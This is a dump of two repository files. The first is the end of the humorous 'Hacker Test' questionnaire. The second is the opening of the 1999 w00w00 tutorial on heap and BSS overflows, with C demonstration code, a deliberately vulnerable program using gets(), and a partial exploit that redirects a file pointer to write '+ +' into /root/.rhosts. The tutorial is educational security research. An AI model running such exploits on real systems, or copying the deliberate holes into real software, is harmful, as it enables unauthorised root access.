you get away with it? 259 | 260 | 0139 Ever engage a drum brake while the drum was spinning? 261 | 262 | 0140 Ever write comments in a non-native language? 263 | 264 | 0141 Ever physically destroy equipment from software? 265 | 266 | 0142 Ever tried to improve your score on the Hacker Test? 267 | 268 | 0143 Do you take listings with you to lunch? 269 | 0144 ... To bed? 270 | 271 | 0145 Ever patch a microcode bug? 272 | 0146 ... around a microcode bug? 273 | 274 | 0147 Can you program a Turing machine? 275 | 276 | 0148 Can you convert postfix to prefix in your head? 277 | 278 | 0149 Can you convert hex to octal in your head? 279 | 280 | 0150 Do you know how to use a Kleene star? 281 | 282 | 0151 Have you ever starved while dining with philosophers? 283 | 284 | 0152 Have you solved the halting problem? 285 | 0153 ... Correctly? 286 | 287 | 0154 Ever deadlock trying eating spaghetti? 288 | 289 | 0155 Ever written a self-reproducing program? 290 | 291 | 0156 Ever swapped out the swapper? 292 | 293 | 0157 Can you read a state diagram? 294 | 0158 ... Do you need one? 295 | 296 | 0159 Ever create an unkillable program? 297 | 0160 ... Intentionally? 298 | 299 | 0161 Ever been asked for a cookie? 300 | 301 | 0162 Ever speed up a system by removing a jumper? 302 | 303 | * Do you know... 304 | 305 | 0163 Do you know who wrote Rogue? 306 | 0164 ... Rogomatic? 307 | 308 | 0165 Do you know Gray code? 309 | 310 | 0166 Do you know what HCF means? 311 | 0167 ... Ever use it? 312 | 0168 ... Intentionally? 313 | 314 | 0169 Do you know what a lace card is? 315 | 0170 ... Ever make one? 316 | 317 | 0171 Do you know the end of the epoch? 318 | 0172 ... Have you celebrated the end of an epoch? 319 | 0173 ... Did you have to rewrite code? 320 | 321 | 0174 Do you know the difference between DTE and DCE? 322 | 323 | 0175 Do you know the RS-232C pinout? 324 | 0176 ... Can you wire a connector without looking? 325 | 326 | * Do you have... 327 | 328 | 0177 Do you have a copy of Dec Wars? 329 | 0178 Do you have the Canonical Collection of Lightbulb Jokes? 330 | 0179 Do you have a copy of the Hacker's dictionary? 331 | 0180 ... Did you contribute to it? 332 | 333 | 0181 Do you have a flowchart template? 334 | 0182 ... Is it unused? 335 | 336 | 0183 Do you have your own fortune-cookie file? 337 | 338 | 0184 Do you have the Anarchist's Cookbook? 339 | 0185 ... Ever make anything from it? 340 | 341 | 0186 Do you own a modem? 342 | 0187 ... a terminal? 343 | 0188 ... a toy computer? 344 | 0189 ... a personal computer? 345 | 0190 ... a minicomputer? 346 | 0191 ... a mainframe? 347 | 0192 ... a supercomputer? 348 | 0193 ... a hypercube? 349 | 0194 ... a printer? 350 | 0195 ... a laser printer? 351 | 0196 ... a tape drive? 352 | 0197 ... an outmoded peripheral device? 353 | 354 | 0198 Do you have a programmable calculator? 355 | 0199 ... Is it RPN? 356 | 357 | 0200 Have you ever owned more than 1 computer? 358 | 0201 ... 4 computers? 359 | 0202 ... 16 computers? 360 | 361 | 0203 Do you have a SLIP line? 362 | 0204 ... a T1 line? 363 | 364 | 0205 Do you have a separate phone line for your terminal/computer? 365 | 0206 ... Is it legal? 366 | 367 | 0207 Do you have core memory? 368 | 0208 ... drum storage? 369 | 0209 ... bubble memory? 370 | 371 | 0210 Do you use more than 16 megabytes of disk space? 372 | 0211 ... 256 megabytes? 373 | 0212 ... 1 gigabyte? 374 | 0213 ... 16 gigabytes? 375 | 0214 ... 256 gigabytes? 376 | 0215 ... 1 terabyte? 377 | 378 | 0216 Do you have an optical disk/disk drive? 379 | 380 | 0217 Do you have a personal magnetic tape library? 381 | 0218 ... Is it unlabelled? 382 | 383 | 0219 Do you own more than 16 floppy disks? 384 | 0220 ... 64 floppy disks? 385 | 0221 ... 256 floppy disks? 386 | 0222 ... 1024 floppy disks? 387 | 388 | 0223 Do you have any 8-inch disks? 389 | 390 | 0224 Do you have an internal stack? 391 | 392 | 0225 Do you have a clock interrupt? 393 | 394 | 0226 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 395 | 0227 ... Have you done all the exercises? 396 | 0228 ... Do you have a MIX simulator? 397 | 0229 ... Can you name the unwritten volumes? 398 | 399 | 0230 Can you quote from _The Mythical Man-month_? 400 | 0231 ... Did you participate in the OS/360 project? 401 | 402 | 0232 Do you have a TTL handbook? 403 | 404 | 0233 Do you have printouts more than three years old? 405 | 406 | * Career 407 | 408 | 0234 Do you have a job? 409 | 0235 ... Have you ever had a job? 410 | 0236 ... Was it computer-related? 411 | 412 | 0237 Do you work irregular hours? 413 | 414 | 0238 Have you ever been a system administrator? 415 | 416 | 0239 Do you have more megabytes than megabucks? 417 | 418 | 0240 Have you ever downgraded your job to upgrade your processing power? 419 | 420 | 0241 Is your job secure? 421 | 0242 ... Do you have code to prove it? 422 | 423 | 0243 Have you ever had a security clearance? 424 | 425 | * Games 426 | 427 | 0244 Have you ever played Pong? 428 | 429 | Have you ever played 430 | 0246 ... Spacewar? 431 | 0247 ... Star Trek? 432 | 0248 ... Wumpus? 433 | 0249 ... Lunar Lander? 434 | 0250 ... Empire? 435 | 436 | Have you ever beaten 437 | 0251 ... Moria 4.8? 438 | 0252 ... Rogue 3.6? 439 | 0253 ... Rogue 5.3? 440 | 0254 ... Larn? 441 | 0255 ... Hack 1.0.3? 442 | 0256 ... Nethack 2.4? 443 | 444 | 0257 Can you get a better score on Rogue than Rogomatic? 445 | 446 | 0258 Have you ever solved Adventure? 447 | 0259 ... Zork? 448 | 449 | 0260 Have you ever written any redcode? 450 | 451 | 0261 Have you ever written an adventure program? 452 | 0262 ... a real-time game? 453 | 0263 ... a multi-player game? 454 | 0264 ... a networked game? 455 | 456 | 0265 Can you out-doctor Eliza? 457 | 458 | * Hardware 459 | 460 | 0266 Have you ever used a light pen? 461 | 0267 ... did you build it? 462 | 463 | Have you ever used 464 | 0268 ... a teletype? 465 | 0269 ... a paper tape? 466 | 0270 ... a decwriter? 467 | 0271 ... a card reader/punch? 468 | 0272 ... a SOL? 469 | 470 | Have you ever built 471 | 0273 ... an Altair? 472 | 0274 ... a Heath/Zenith computer? 473 | 474 | Do you know how to use 475 | 0275 ... an oscilliscope? 476 | 0276 ... a voltmeter? 477 | 0277 ... a frequency counter? 478 | 0278 ... a logic probe? 479 | 0279 ... a wirewrap tool? 480 | 0280 ... a soldering iron? 481 | 0281 ... a logic analyzer? 482 | 483 | 0282 Have you ever designed an LSI chip? 484 | 0283 ... has it been fabricated? 485 | 486 | 0284 Have you ever etched a printed circuit board? 487 | 488 | * Historical 489 | 490 | 0285 Have you ever toggled in boot code on the front panel? 491 | 0286 ... from memory? 492 | 493 | 0287 Can you program an Eniac? 494 | 495 | 0288 Ever seen a 90 column card? 496 | 497 | * IBM 498 | 499 | 0289 Do you recite IBM part numbers in your sleep? 500 | 0290 Do you know what IBM part number 7320154 is? 501 | 502 | 0291 Do you understand 3270 data streams? 503 | 504 | 0292 Do you know what the VM privilege classes are? 505 | 506 | 0293 Have you IPLed an IBM off the tape drive? 507 | 0294 ... off a card reader? 508 | 509 | 0295 Can you sing something from the IBM Songbook? 510 | 511 | * Languages 512 | 513 | 0296 Do you know more than 4 programming languages? 514 | 0297 ... 8 languages? 515 | 0298 ... 16 languages? 516 | 0299 ... 32 languages? 517 | 518 | 0300 Have you ever designed a programming language? 519 | 520 | 0301 Do you know what Basic stands for? 521 | 0302 ... Pascal? 522 | 523 | 0303 Can you program in Basic? 524 | 0304 ... Do you admit it? 525 | 526 | 0305 Can you program in Cobol? 527 | 0306 ... Do you deny it? 528 | 529 | 0307 Do you know Pascal? 530 | 0308 ... Modula-2? 531 | 0309 ... Oberon? 532 | 0310 ... More that two Wirth languages? 533 | 0311 ... Can you recite a Nicklaus Wirth joke? 534 | 535 | 0312 Do you know Algol-60? 536 | 0313 ... Algol-W? 537 | 0314 ... Algol-68? 538 | 0315 ... Do you understand the Algol-68 report? 539 | 0316 ... Do you like two-level grammars? 540 | 541 | 0317 Can you program in assembler on 2 different machines? 542 | 0318 ... on 4 different machines? 543 | 0319 ... on 8 different machines? 544 | 545 | Do you know 546 | 0320 ... APL? 547 | 0321 ... Ada? 548 | 0322 ... BCPL? 549 | 0323 ... C++? 550 | 0324 ... C? 551 | 0325 ... Comal? 552 | 0326 ... Eiffel? 553 | 0327 ... Forth? 554 | 0328 ... Fortran? 555 | 0329 ... Hypertalk? 556 | 0330 ... Icon? 557 | 0331 ... Lisp? 558 | 0332 ... Logo? 559 | 0333 ... MIIS? 560 | 0334 ... MUMPS? 561 | 0335 ... PL/I? 562 | 0336 ... Pilot? 563 | 0337 ... Plato? 564 | 0338 ... Prolog? 565 | 0339 ... RPG? 566 | 0340 ... Rexx (or ARexx)? 567 | 0341 ... SETL? 568 | 0342 ... Smalltalk? 569 | 0343 ... Snobol? 570 | 0344 ... VHDL? 571 | 0345 ... any assembly language? 572 | 573 | 0346 Can you talk VT-100? 574 | 0347 ... Postscript? 575 | 0348 ... SMTP? 576 | 0349 ... UUCP? 577 | 0350 ... English? 578 | 579 | * Micros 580 | 581 | 0351 Ever copy a copy-protected disk? 582 | 0352 Ever create a copy-protection scheme? 583 | 584 | 0353 Have you ever made a "flippy" disk? 585 | 586 | 0354 Have you ever recovered data from a damaged disk? 587 | 588 | 0355 Ever boot a naked floppy? 589 | 590 | * Networking 591 | 592 | 0356 Have you ever been logged in to two different timezones at once? 593 | 594 | 0357 Have you memorized the UUCP map for your country? 595 | 0358 ... For any country? 596 | 597 | 0359 Have you ever found a sendmail bug? 598 | 0360 ... Was it a security hole? 599 | 600 | 0361 Have you memorized the HOSTS.TXT table? 601 | 0362 ... Are you up to date? 602 | 603 | 0363 Can you name all the top-level nameservers and their addresses? 604 | 605 | 0364 Do you know RFC-822 by heart? 606 | 0365 ... Can you recite all the errors in it? 607 | 608 | 0366 Have you written a Sendmail configuration file? 609 | 0367 ... Does it work? 610 | 0368 ... Do you mumble "defocus" in your sleep? 611 | 612 | 0369 Do you know the max packet lifetime? 613 | 614 | * Operating systems 615 | 616 | Can you use 617 | 0370 ... BSD Unix? 618 | 0371 ... non-BSD Unix? 619 | 0372 ... AIX 620 | 0373 ... VM/CMS? 621 | 0374 ... VMS? 622 | 0375 ... MVS? 623 | 0376 ... VSE? 624 | 0377 ... RSTS/E? 625 | 0378 ... CP/M? 626 | 0379 ... COS? 627 | 0380 ... NOS? 628 | 0381 ... CP-67? 629 | 0382 ... RT-11? 630 | 0383 ... MS-DOS? 631 | 0384 ... Finder? 632 | 0385 ... PRODOS? 633 | 0386 ... more than one OS for the TRS-80? 634 | 0387 ... Tops-10? 635 | 0388 ... Tops-20? 636 | 0389 ... OS-9? 637 | 0390 ... OS/2? 638 | 0391 ... AOS/VS? 639 | 0392 ... Multics? 640 | 0393 ... ITS? 641 | 0394 ... Vulcan? 642 | 643 | 0395 Have you ever paged or swapped off a tape drive? 644 | 0396 ... Off a card reader/punch? 645 | 0397 ... Off a teletype? 646 | 0398 ... Off a networked (non-local) disk? 647 | 648 | 0399 Have you ever found an operating system bug? 649 | 0400 ... Did you exploit it? 650 | 0401 ... Did you report it? 651 | 0402 ... Was your report ignored? 652 | 653 | 0403 Have you ever crashed a machine? 654 | 0404 ... Intentionally? 655 | 656 | * People 657 | 658 | 0405 Do you know any people? 659 | 0406 ... more than one? 660 | 0407 ... more than two? 661 | 662 | * Personal 663 | 664 | 0408 Are your shoelaces untied? 665 | 666 | 0409 Do you interface well with strangers? 667 | 668 | 0410 Are you able to recite phone numbers for half-a-dozen computer systems 669 | but unable to recite your own? 670 | 671 | 0411 Do you log in before breakfast? 672 | 673 | 0412 Do you consume more than LD-50 caffeine a day? 674 | 675 | 0413 Do you answer either-or questions with "yes"? 676 | 677 | 0414 Do you own an up-to-date copy of any operating system manual? 678 | 0415 ... *every* operating system manual? 679 | 680 | 0416 Do other people have difficulty using your customized environment? 681 | 682 | 0417 Do you dream in any programming languages? 683 | 684 | 0418 Do you have difficulty focusing on three-dimensional objects? 685 | 686 | 0419 Do you ignore mice? 687 | 688 | 0420 Do you despise the CAPS LOCK key? 689 | 690 | 0421 Do you believe menus belong in restaurants? 691 | 692 | 0422 Do you have a Mandelbrot hanging on your wall? 693 | 694 | 0423 Have you ever decorated with magnetic tape or punched cards? 695 | 0424 Do you have a disk platter or a naked floppy hanging in your home? 696 | 697 | 0425 Have you ever seen the dawn? 698 | 0426 ... Twice in a row? 699 | 700 | 0427 Do you use "foobar" in daily conversation? 701 | 0428 ... "bletch"? 702 | 703 | 0429 Do you use the "P convention"? 704 | 705 | 0430 Do you automatically respond to any user question with RTFM? 706 | 0431 ... Do you know what it means? 707 | 708 | 0432 Do you think garbage collection means memory management? 709 | 710 | 0433 Do you have problems allocating horizontal space in your room/office? 711 | 712 | 0434 Do you read Scientific American in bars to pick up women? 713 | 714 | 0435 Is your license plate computer-related? 715 | 716 | 0436 Have you ever taken the Purity test? 717 | 718 | 0437 Ever have an out-of-CPU experience? 719 | 720 | 0438 Have you ever set up a blind date over the computer? 721 | 722 | 0439 Do you talk to the person next to you via computer? 723 | 724 | * Programming 725 | 726 | 0440 Can you write a Fortran compiler? 727 | 0441 ... In TECO? 728 | 729 | 0442 Can you read a machine dump? 730 | 0443 Can you disassemble code in your head? 731 | 732 | Have you ever written 733 | 0444 ... a compiler? 734 | 0445 ... an operating system? 735 | 0446 ... a device driver? 736 | 0447 ... a text processor? 737 | 0448 ... a display hack? 738 | 0449 ... a database system? 739 | 0450 ... an expert system? 740 | 0451 ... an edge detector? 741 | 0452 ... a real-time control system? 742 | 0453 ... an accounting package? 743 | 0454 ... a virus? 744 | 0455 ... a prophylactic? 745 | 746 | 0456 Have you ever written a biorhythm program? 747 | 0457 ... Did you sell the output? 748 | 0458 ... Was the output arbitrarily invented? 749 | 750 | 0459 Have you ever computed pi to more than a thousand decimal places? 751 | 0460 ... the number e? 752 | 753 | 0461 Ever find a prime number of more than a hundred digits? 754 | 755 | 0462 Have you ever written self-modifying code? 756 | 0463 ... Are you proud of it? 757 | 758 | 0464 Did you ever write a program that ran correctly the first time? 759 | 0465 ... Was it longer than 20 lines? 760 | 0466 ... 100 lines? 761 | 0467 ... Was it in assembly language? 762 | 0468 ... Did it work the second time? 763 | 764 | 0469 Can you solve the Towers of Hanoi recursively? 765 | 0470 ... Non-recursively? 766 | 0471 ... Using the Troff text formatter? 767 | 768 | 0472 Ever submit an entry to the Obfuscated C code contest? 769 | 0473 ... Did it win? 770 | 0474 ... Did your entry inspire a new rule? 771 | 772 | 0475 Do you know Duff's device? 773 | 774 | 0476 Do you know Jensen's device? 775 | 776 | 0477 Ever spend ten minutes trying to find a single-character error? 777 | 0478 ... More than an hour? 778 | 0479 ... More than a day? 779 | 0480 ... More than a week? 780 | 0481 ... Did the first person you show it to find it immediately? 781 | 782 | * Unix 783 | 784 | 0482 Can you use Berkeley Unix? 785 | 0483 .. Non-Berkeley Unix? 786 | 787 | 0484 Can you distinguish between sections 4 and 5 of the Unix manual? 788 | 789 | 0485 Can you find TERMIO in the System V release 2 documentation? 790 | 791 | 0486 Have you ever mounted a tape as a Unix file system? 792 | 793 | 0487 Have you ever built Minix? 794 | 795 | 0488 Can you answer "quiz function ed-command" correctly? 796 | 0489 ... How about "quiz ed-command function"? 797 | 798 | * Usenet 799 | 800 | 0490 Do you read news? 801 | 0491 ... More than 32 newsgroups? 802 | 0492 ... More than 256 newsgroups? 803 | 0493 ... All the newsgroups? 804 | 805 | 0494 Have you ever posted an article? 806 | 0495 ... Do you post regularly? 807 | 808 | 0496 Have you ever posted a flame? 809 | 0497 ... Ever flame a cross-posting? 810 | 0498 ... Ever flame a flame? 811 | 0499 ... Do you flame regularly? 812 | 813 | 0500 Ever have your program posted to a source newsgroup? 814 | 815 | 0501 Ever forge a posting? 816 | 0502 Ever form a new newsgroup? 817 | 0503 ... Does it still exist? 818 | 819 | 0504 Do you remember 820 | 0505 ... mod.ber? 821 | 0506 ... the Stupid People's Court? 822 | 0507 ... Bandy-grams? 823 | 824 | * Phreaking 825 | 826 | 0508 Have you ever built a black box? 827 | 828 | 0509 Can you name all of the 'colors' of boxes? 829 | 0510 ... and their associated functions? 830 | 831 | 0511 Does your touch tone phone have 16 DTMF buttons on it? 832 | 833 | 0512 Did the breakup of MaBell create more opportunities for you? 834 | 835 | 836 | If you have any comments of suggestions regarding the HACKER TEST, 837 | Please send then to: hayes@psunuce.bitnet 838 | or jwh100@psuvm.bitnet / jwh100@psuvmxa.bitnet 839 | or jwh100@psuvm.psu.edu / jwh100@psuvmxa.psu.edu 840 | or ...!psuvax1!psuvm.bitnet!jwh100 841 | 842 | -------------------------------------------------------------------------------- /heaptut.txt: -------------------------------------------------------------------------------- 1 | Subject: w00w00 on Heap Overflows 2 | 3 | This is a PRELIMINARY BETA VERSION of our final article! We apologize for 4 | any mistakes. We still need to add a few more things. 5 | 6 | [ Note: You may also get this article off of ] 7 | [ http://www.w00w00.org/articles.html. ] 8 | 9 | w00w00 on Heap Overflows 10 | By: Matt Conover & w00w00 Security Team 11 | 12 | ------------------------------------------------------------------------------ 13 | Copyright (C) January 1999, Matt Conover & w00w00 Security Development 14 | 15 | You may freely redistribute or republish this article, provided the 16 | following conditions are met: 17 | 18 | 1. This article is left intact (no changes made, the full article 19 | published, etc.) 20 | 21 | 2. Proper credit is given to its authors; Matt Conover and the 22 | w00w00 Security Development (WSD). 23 | 24 | You are free to rewrite your own articles based on this material (assuming 25 | the above conditions are met). It'd also be appreciated if an e-mail is 26 | sent to either mattc@repsec.com or shok@dataforce.net to let us know you 27 | are going to be republishing this article or writing an article based upon 28 | one of our ideas. 29 | 30 | ------------------------------------------------------------------------------ 31 | 32 | Prelude: 33 | Heap/BSS-based overflows are fairly common in applications today; yet, 34 | they are rarely reported. Therefore, we felt it was appropriate to 35 | present a "heap overflow" tutorial. The biggest critics of this article 36 | will probably be those who argue heap overflows have been around for a 37 | while. Of course they have, but that doesn't negate the need for such 38 | material. 39 | 40 | In this article, we will refer to "overflows involving the stack" as 41 | "stack-based overflows" ("stack overflow" is misleading) and "overflows 42 | involving the heap" as "heap-based overflows". 43 | 44 | This article should provide the following: a better understanding 45 | of heap-based overflows along with several methods of exploitation, 46 | demonstrations, and some possible solutions/fixes. Prerequisites to 47 | this article: a general understanding of computer architecture, 48 | assembly, C, and stack overflows. 49 | 50 | This is a collection of the insights we have gained through our research 51 | with heap-based overflows and the like. We have written all the 52 | examples and exploits included in this article; therefore, the copyright 53 | applies to them as well. 54 | 55 | 56 | Why Heap/BSS Overflows are Significant 57 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 58 | As more system vendors add non-executable stack patches, or individuals 59 | apply their own patches (e.g., Solar Designer's non-executable stack 60 | patch), a different method of penetration is needed by security 61 | consultants (or else, we won't have jobs!). Let me give you a few 62 | examples: 63 | 64 | 1. Searching for the word "heap" on BugTraq (for the archive, see 65 | www.geek-girl.com/bugtraq), yields only 40+ matches, whereas 66 | "stack" yields 2300+ matches (though several are irrelevant). Also, 67 | "stack overflow" gives twice as many matches as "heap" does. 68 | 69 | 2. Solaris (an OS developed by Sun Microsystems), as of Solaris 70 | 2.6, sparc Solaris includes a "protect_stack" option, but not an 71 | equivalent "protect_heap" option. Fortunately, the bss is not 72 | executable (and need not be). 73 | 74 | 3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but 75 | no equivalent "HeapGuard". 76 | 77 | 4. Using a heap/bss-based overflow was one of the "potential" methods 78 | of getting around StackGuard. The following was posted to BugTraq 79 | by Tim Newsham several months ago: 80 | 81 | > Finally the precomputed canary values may be a target 82 | > themselves. If there is an overflow in the data or bss segments 83 | > preceding the precomputed canary vector, an attacker can simply 84 | > overwrite all the canary values with a single value of his 85 | > choosing, effectively turning off stack protection. 86 | 87 | 5. Some people have actually suggested making a "local" buffer a 88 | "static" buffer, as a fix! This not very wise; yet, it is a fairly 89 | common misconception of how the heap or bss work. 90 | 91 | Although heap-based overflows are not new, they don't seem to be well 92 | understood. 93 | 94 | Note: 95 | One argument is that the presentation of a "heap-based overflow" is 96 | equivalent to a "stack-based overflow" presentation. However, only a 97 | small proportion of this article has the same presentation (if you 98 | will) that is equivalent to that of a "stack-based overflow". 99 | 100 | People go out of their way to prevent stack-based overflows, but leave 101 | their heaps/bss' completely open! On most systems, both heap and bss are 102 | both executable and writeable (an excellent combination). This makes 103 | heap/bss overflows very possible. But, I don't see any reason for the 104 | bss to be executable! What is going to be executed in zero-filled 105 | memory?! 106 | 107 | For the security consultant (the ones doing the penetration assessment), 108 | most heap-based overflows are system and architecture independent, 109 | including those with non-executable heaps. This will all be demonstrated 110 | in the "Exploiting Heap/BSS Overflows" section. 111 | 112 | Terminology 113 | ~~~~~~~~~~~ 114 | An executable file, such as ELF (Executable and Linking Format) 115 | executable, has several "sections" in the executable file, such as: the 116 | PLT (Procedure Linking Table), GOT (Global Offset Table), init 117 | (instructions executed on initialization), fini (instructions to be 118 | executed upon termination), and ctors and dtors (contains global 119 | constructors/destructors). 120 | 121 | 122 | "Memory that is dynamically allocated by the application is known as the 123 | heap." The words "by the application" are important here, as on good 124 | systems most areas are in fact dynamically allocated at the kernel level, 125 | while for the heap, the allocation is requested by the application. 126 | 127 | Heap and Data/BSS Sections 128 | ~~~~~~~~~~~~~~~~~~~~~~~~~~ 129 | The heap is an area in memory that is dynamically allocated by the 130 | application. The data section initialized at compile-time. 131 | 132 | The bss section contains uninitialized data, and is allocated at 133 | run-time. Until it is written to, it remains zeroed (or at least from 134 | the application's point-of-view). 135 | 136 | Note: 137 | When we refer to a "heap-based overflow" in the sections below, we are 138 | most likely referring to buffer overflows of both the heap and data/bss 139 | sections. 140 | 141 | On most systems, the heap grows up (towards higher addresses). Hence, 142 | when we say "X is below Y," it means X is lower in memory than Y. 143 | 144 | 145 | Exploiting Heap/BSS Overflows 146 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 147 | In this section, we'll cover several different methods to put heap/bss 148 | overflows to use. Most of examples for Unix-dervied x86 systems, will 149 | also work in DOS and Windows (with a few changes). We've also included 150 | a few DOS/Windows specific exploitation methods. An advanced warning: 151 | this will be the longest section, and should be studied the most. 152 | 153 | Note: 154 | In this article, I use the "exact offset" approach. The offset 155 | must be closely approximated to its actual value. The alternative is 156 | "stack-based overflow approach" (if you will), where one repeats the 157 | addresses to increase the likelihood of a successful exploit. 158 | 159 | While this example may seem unnecessary, we're including it for those who 160 | are unfamiliar with heap-based overflows. Therefore, we'll include this 161 | quick demonstration: 162 | ----------------------------------------------------------------------------- 163 | /* demonstrates dynamic overflow in heap (initialized data) */ 164 | 165 | #include 166 | #include 167 | #include 168 | #include 169 | 170 | #define BUFSIZE 16 171 | #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */ 172 | 173 | int main() 174 | { 175 | u_long diff; 176 | char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE); 177 | 178 | diff = (u_long)buf2 - (u_long)buf1; 179 | printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff); 180 | 181 | memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0'; 182 | 183 | printf("before overflow: buf2 = %s\n", buf2); 184 | memset(buf1, 'B', (u_int)(diff + OVERSIZE)); 185 | printf("after overflow: buf2 = %s\n", buf2); 186 | 187 | return 0; 188 | } 189 | ----------------------------------------------------------------------------- 190 | 191 | If we run this, we'll get the following: 192 | [root /w00w00/heap/examples/basic]# ./heap1 8 193 | buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes 194 | before overflow: buf2 = AAAAAAAAAAAAAAA 195 | after overflow: buf2 = BBBBBBBBAAAAAAA 196 | 197 | This works because buf1 overruns its boundaries into buf2's heap space. 198 | But, because buf2's heap space is still valid (heap) memory, the program 199 | doesn't crash. 200 | 201 | Note: 202 | A possible fix for a heap-based overflow, which will be mentioned 203 | later, is to put "canary" values between all variables on the heap 204 | space (like that of StackGuard mentioned later) that mustn't be changed 205 | throughout execution. 206 | 207 | You can get the complete source to all examples used in this article, 208 | from the file attachment, heaptut.tgz. You can also download this from 209 | our article archive at http://www.w00w00.org/articles.html. 210 | 211 | Note: 212 | To demonstrate a bss-based overflow, change line: 213 | from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]' 214 | 215 | Yes, that was a very basic example, but we wanted to demonstrate a heap 216 | overflow at its most primitive level. This is the basis of almost 217 | all heap-based overflows. We can use it to overwrite a filename, a 218 | password, a saved uid, etc. Here is a (still primitive) example of 219 | manipulating pointers: 220 | ----------------------------------------------------------------------------- 221 | /* demonstrates static pointer overflow in bss (uninitialized data) */ 222 | 223 | #include 224 | #include 225 | #include 226 | #include 227 | #include 228 | 229 | #define BUFSIZE 16 230 | #define ADDRLEN 4 /* # of bytes in an address */ 231 | 232 | int main() 233 | { 234 | u_long diff; 235 | static char buf[BUFSIZE], *bufptr; 236 | 237 | bufptr = buf, diff = (u_long)&bufptr - (u_long)buf; 238 | 239 | printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 240 | &bufptr, bufptr, buf, diff, diff); 241 | 242 | memset(buf, 'A', (u_int)(diff + ADDRLEN)); 243 | 244 | printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 245 | &bufptr, bufptr, buf, diff, diff); 246 | 247 | return 0; 248 | } 249 | ----------------------------------------------------------------------------- 250 | 251 | The results: 252 | [root /w00w00/heap/examples/basic]# ./heap3 253 | bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes 254 | bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes 255 | 256 | When run, one clearly sees that the pointer now points to a different 257 | address. Uses of this? One example is that we could overwrite a 258 | temporary filename pointer to point to a separate string (such as 259 | argv[1], which we could supply ourselves), which could contain 260 | "/root/.rhosts". Hopefully, you are starting to see some potential uses. 261 | 262 | To demonstrate this, we will use a temporary file to momentarily save 263 | some input from the user. This is our finished "vulnerable program": 264 | ----------------------------------------------------------------------------- 265 | /* 266 | * This is a typical vulnerable program. It will store user input in a 267 | * temporary file. 268 | * 269 | * Compile as: gcc -o vulprog1 vulprog1.c 270 | */ 271 | 272 | #include 273 | #include 274 | #include 275 | #include 276 | #include 277 | 278 | #define ERROR -1 279 | #define BUFSIZE 16 280 | 281 | /* 282 | * Run this vulprog as root or change the "vulfile" to something else. 283 | * Otherwise, even if the exploit works, it won't have permission to 284 | * overwrite /root/.rhosts (the default "example"). 285 | */ 286 | 287 | int main(int argc, char **argv) 288 | { 289 | FILE *tmpfd; 290 | static char buf[BUFSIZE], *tmpfile; 291 | 292 | if (argc <= 1) 293 | { 294 | fprintf(stderr, "Usage: %s \n", argv[0]); 295 | exit(ERROR); 296 | } 297 | 298 | tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */ 299 | printf("before: tmpfile = %s\n", tmpfile); 300 | 301 | printf("Enter one line of data to put in %s: ", tmpfile); 302 | gets(buf); 303 | 304 | printf("\nafter: tmpfile = %s\n", tmpfile); 305 | 306 | tmpfd = fopen(tmpfile, "w"); 307 | if (tmpfd == NULL) 308 | { 309 | fprintf(stderr, "error opening %s: %s\n", tmpfile, 310 | strerror(errno)); 311 | 312 | exit(ERROR); 313 | } 314 | 315 | fputs(buf, tmpfd); 316 | fclose(tmpfd); 317 | } 318 | 319 | ----------------------------------------------------------------------------- 320 | 321 | The aim of this "example" program is to demonstrate that something of 322 | this nature can easily occur in programs (although hopefully not setuid 323 | or root-owned daemon servers). 324 | 325 | And here is our exploit for the vulnerable program: 326 | ----------------------------------------------------------------------------- 327 | /* 328 | * Copyright (C) January 1999, Matt Conover & WSD 329 | * 330 | * This will exploit vulprog1.c. It passes some arguments to the 331 | * program (that the vulnerable program doesn't use). The vulnerable 332 | * program expects us to enter one line of input to be stored 333 | * temporarily. However, because of a static buffer overflow, we can 334 | * overwrite the temporary filename pointer, to have it point to 335 | * argv[1] (which we could pass as "/root/.rhosts"). Then it will 336 | * write our temporary line to this file. So our overflow string (what 337 | * we pass as our input line) will be: 338 | * + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address 339 | * 340 | * We use "+ +" (all hosts), followed by '#' (comment indicator), to 341 | * prevent our "attack code" from causing problems. Without the 342 | * "#", programs using .rhosts would misinterpret our attack code. 343 | * 344 | * Compile as: gcc -o exploit1 exploit1.c 345 | */ 346 | 347 | #include 348 | #include 349 | #include 350 | #include 351 | 352 | #define BUFSIZE 256 353 | 354 | #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */ 355 | 356 | #define VULPROG "./vulprog1" 357 | #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */ 358 | 359 | /* get value of sp off the stack (used to calculate argv[1] address) */ 360 | u_long getesp() 361 | { 362 | __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */ 363 | } 364 | 365 | int main(int argc, char **argv) 366 | { 367 | u_long addr; 368 | 369 | register int i; 370 | int mainbufsize; 371 | 372 | char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; 373 | 374 | /* ------------------------------------------------------ */ 375 | if (argc <= 1) 376 | { 377 | fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]); 378 | exit(ERROR); 379 | } 380 | /* ------------------------------------------------------ */ 381 | 382 | memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); 383 | 384 | memset(buf + strlen(buf), 'A', DIFF); 385 | addr = getesp() + atoi(argv[1]); 386 | 387 | /* reverse byte order (on a little endian system) */ 388 | for (i = 0; i < sizeof(u_long); i++) 389 | buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255); 390 | 391 | mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13; 392 | 393 | mainbuf = (char *)malloc(mainbufsize); 394 | 